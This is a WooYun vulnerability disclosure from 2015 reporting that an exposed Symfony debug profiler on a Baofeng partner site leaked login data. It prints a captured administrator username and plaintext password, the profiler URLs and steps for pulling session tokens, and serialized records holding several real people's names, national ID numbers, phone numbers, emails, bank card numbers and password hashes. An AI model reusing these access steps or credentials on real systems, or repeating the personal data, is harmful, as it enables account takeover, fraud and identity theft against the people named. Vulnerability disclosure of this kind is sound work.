当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126789

漏洞标题:暴风影音某站泄漏用户(明文密码/银行卡号/姓名/邮箱/手机号/)

相关厂商:暴风影音

漏洞作者: null_z

提交时间:2015-07-14 18:46

修复时间:2015-08-29 10:14

公开时间:2015-08-29 10:14

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-25: 细节向核心白帽子及相关领域专家公开
2015-08-04: 细节向普通白帽子公开
2015-08-14: 细节向实习白帽子公开
2015-08-29: 细节向公众公开

简要描述:

可导致部分用户(姓名/银行卡号/手机号/邮箱/密码明文)
不过我想,已经抓到管理员帐号密码明文。一切只是时间问题。

详细说明:

用symfony这个框架搭建的配置不当
后台地址http://union.baofeng.com/login
抓到管理员帐号密码

Key	Value
_password	"wangnan123"
_target_path	"/admin/"
_username	"bfwangnan"


2015-07-14 18:35:24的屏幕截图.png


2015-07-14 18:35:38的屏幕截图.png


这个洞最蛋疼的就是得等,不过管理帐号都搞到了,就不用再等了
浏览这个页面http://union.baofeng.com/_profiler/empty/search/results?limit=100
关键信息就是第一行的token
我们用这个token访问这个http://union.baofeng.com/_profiler/b616dc
把token加到_profiler后面
我列举几个 姜兆勇 [email protected] 15996110393 320723198510192617 6217001280001247353
http://union.baofeng.com/_profiler/60e43b

"C:74:\"Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken\":2385:{a:3:{i:0;N;i:1;s:12:\"secured_area\";i:2;s:2335:\"a:4:{i:0;O:30:\"Baofeng\\NvwaBundle\\Entity\\User\":32:{s:34:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000id\";i:25650;s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000baofeng_uid\";s:18:\"135601920031388542\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000username\";s:9:\"pierjiang\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000password\";s:32:\"040b96942b3bc38647365171c4e05ea8\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000email\";s:16:\"[email protected]\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000phone\";s:11:\"15996110393\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000realname\";s:9:\"姜兆勇\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000promote_code\";i:61645804;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000channel_id\";N;s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000balance\";i:2240;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_type\";i:2;s:38:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000status\";i:2;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_roles\";s:25:\"ROLE_SITE_OWNER,ROLE_USER\";s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_at\";i:1394679128;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_by\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_by\";i:0;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_at\";i:1394763193;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_by\";i:20971;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_by\";i:0;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000last_login\";i:1436867562;s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_bank\";s:3:\"CCB\";s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_province\";i:18;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_city\";i:129;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_found\";s:27:\"连云港海棠路分理处\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_card\";s:19:\"6217001280001247353\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_name\";s:9:\"姜兆勇\";s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000identity_no\";s:18:\"320723198510192617\";s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000is_paid\";i:1;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_ratio\";N;s:48:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_discount\";d:1;}i:1;b:1;i:2;a:2:{i:0;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:15:\"ROLE_SITE_OWNER\";}i:1;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:9:\"ROLE_USER\";}}i:3;a:0:{}}\";}}"


2015-07-14 18:06:51的屏幕截图.png

2015-07-14 18:02:27的屏幕截图.png


http://union.baofeng.com/_profiler/79e874
秦嘉成 445321198507235214 [email protected] 18620909778 557decc0bfc6ef3dcfeaf4f9f05819af

"C:74:\"Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken\":2220:{a:3:{i:0;N;i:1;s:12:\"secured_area\";i:2;s:2170:\"a:4:{i:0;O:30:\"Baofeng\\NvwaBundle\\Entity\\User\":32:{s:34:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000id\";i:29720;s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000baofeng_uid\";s:18:\"135601920065572877\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000username\";s:7:\"ken1288\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000password\";s:32:\"557decc0bfc6ef3dcfeaf4f9f05819af\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000email\";s:16:\"[email protected]\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000phone\";s:11:\"18620909778\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000realname\";s:9:\"秦嘉成\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000promote_code\";i:31817884;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000channel_id\";N;s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000balance\";i:90;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_type\";i:1;s:38:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000status\";i:2;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_roles\";s:9:\"ROLE_USER\";s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_at\";i:1428939059;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_by\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_by\";i:0;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_at\";i:1429510375;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_by\";i:20971;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_by\";i:0;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000last_login\";i:1436866632;s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_bank\";s:3:\"BOC\";s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_province\";i:27;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_city\";i:250;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_found\";s:18:\"广州羊城支行\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_card\";s:19:\"6227003320750325120\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_name\";s:9:\"秦嘉成\";s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000identity_no\";s:18:\"445321198507235214\";s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000is_paid\";i:1;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_ratio\";N;s:48:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_discount\";d:1;}i:1;b:1;i:2;a:1:{i:0;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:9:\"ROLE_USER\";}}i:3;a:0:{}}\";}}"


http://union.baofeng.com/_profiler/e6a93e

"C:74:\"Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken\":3354:{a:3:{i:0;N;i:1;s:12:\"secured_area\";i:2;s:3304:\"a:4:{i:0;O:30:\"Baofeng\\NvwaBundle\\Entity\\User\":32:{s:34:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000id\";i:20971;s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000baofeng_uid\";s:18:\"135601920019788257\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000username\";s:10:\"bfwangnan \";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000password\";s:32:\"9c0ac866ba42e7fe3c10b803f624534f\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000email\";s:19:\"[email protected]\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000phone\";s:10:\"1235414321\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000realname\";s:10:\"bfwangnan \";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000promote_code\";i:0;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000channel_id\";N;s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000balance\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_type\";i:9;s:38:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000status\";i:2;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_roles\";s:135:\"ROLE_SUPER_ADMIN,ROLE_USER_ADMIN,ROLE_FINANCE,ROLE_STATS,ROLE_SITE_ADMIN,ROLE_PAGE_EDITOR,ROLE_PAGE_ADMIN,ROLE_BD_ADMIN,ROLE_SHOP_ADMIN\";s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_at\";i:1375266262;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_by\";i:1;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_at\";i:1428377095;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_by\";i:20971;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_at\";i:0;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_by\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_by\";i:0;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000last_login\";i:1436866861;s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_bank\";s:0:\"\";s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_province\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_city\";i:0;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_found\";s:0:\"\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_card\";s:0:\"\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_name\";s:0:\"\";s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000identity_no\";s:0:\"\";s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000is_paid\";i:1;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_ratio\";N;s:48:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_discount\";d:1;}i:1;b:1;i:2;a:9:{i:0;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:16:\"ROLE_SUPER_ADMIN\";}i:1;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:15:\"ROLE_USER_ADMIN\";}i:2;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:12:\"ROLE_FINANCE\";}i:3;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:10:\"ROLE_STATS\";}i:4;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:15:\"ROLE_SITE_ADMIN\";}i:5;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:16:\"ROLE_PAGE_EDITOR\";}i:6;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:15:\"ROLE_PAGE_ADMIN\";}i:7;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:13:\"ROLE_BD_ADMIN\";}i:8;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:15:\"ROLE_SHOP_ADMIN\";}}i:3;a:0:{}}\";}}"


http://union.baofeng.com/_profiler/40f295
冯晶晶 [email protected] 798c089807b2ec3ff4d67a34f436185c 18201659496

"C:74:\"Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken\":2191:{a:3:{i:0;N;i:1;s:12:\"secured_area\";i:2;s:2141:\"a:4:{i:0;O:30:\"Baofeng\\NvwaBundle\\Entity\\User\":32:{s:34:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000id\";i:28800;s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000baofeng_uid\";s:18:\"135601920055985064\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000username\";s:16:\"zhuangjilianmeng\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000password\";s:32:\"798c089807b2ec3ff4d67a34f436185c\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000email\";s:16:\"[email protected]\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000phone\";s:11:\"18201659496\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000realname\";s:9:\"冯晶晶\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000promote_code\";i:26756774;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000channel_id\";N;s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000balance\";i:60420;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_type\";i:1;s:38:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000status\";i:2;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_roles\";s:9:\"ROLE_USER\";s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_at\";i:1421980882;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_by\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_at\";i:1421997796;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_by\";i:20971;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_at\";i:1421996666;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_by\";i:20971;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_by\";i:0;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000last_login\";i:1436866778;s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_bank\";s:0:\"\";s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_province\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_city\";i:0;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_found\";s:0:\"\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_card\";s:0:\"\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_name\";s:0:\"\";s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000identity_no\";s:0:\"\";s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000is_paid\";i:1;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_ratio\";N;s:48:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_discount\";d:0.40000000000000002;}i:1;b:1;i:2;a:1:{i:0;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:9:\"ROLE_USER\";}}i:3;a:0:{}}\";}}"

漏洞证明:

2015-07-14 18:35:24的屏幕截图.png

2015-07-14 18:35:38的屏幕截图.png

2015-07-14 18:06:51的屏幕截图.png

2015-07-14 18:02:27的屏幕截图.png

修复方案:

你懂得!

版权声明:转载请注明来源 null_z@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-15 10:12

厂商回复:

感谢您提交的漏洞,我们会尽快修复

最新状态:

暂无